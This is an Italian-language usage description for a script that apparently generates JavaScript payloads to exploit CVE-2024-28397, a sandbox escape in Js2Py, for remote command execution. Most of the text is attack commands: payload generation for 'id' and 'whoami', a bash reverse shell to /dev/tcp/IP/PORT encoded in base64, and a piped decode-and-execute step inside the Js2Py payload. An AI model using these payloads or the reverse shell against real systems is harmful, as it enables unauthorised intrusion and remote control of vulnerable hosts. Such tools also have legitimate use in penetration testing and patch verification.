
Genera payload JavaScript per sfruttare la sandbox escape CVE-2024-28397 di Js2Py, consentendo l'esecuzione remota di comandi e reverse shell tramite l'esposizione degli internals di Python.
Questo script genera un payload JavaScript che può essere valutato da Js2Py in ambienti vulnerabili dove gli internals di Python sono esposti tramite wrapper di oggetti.
Esecuzione di base di un comando:
python3 cve-2024-28397.py -c "id"
Genera un payload compatto su una sola riga:
python3 cve-2024-28397.py -c "whoami" --compact
Genera il payload Base64:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Genera il payload Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Sostituisci BASE64_OUTPUT con la stringa Base64 generata nel primo passaggio.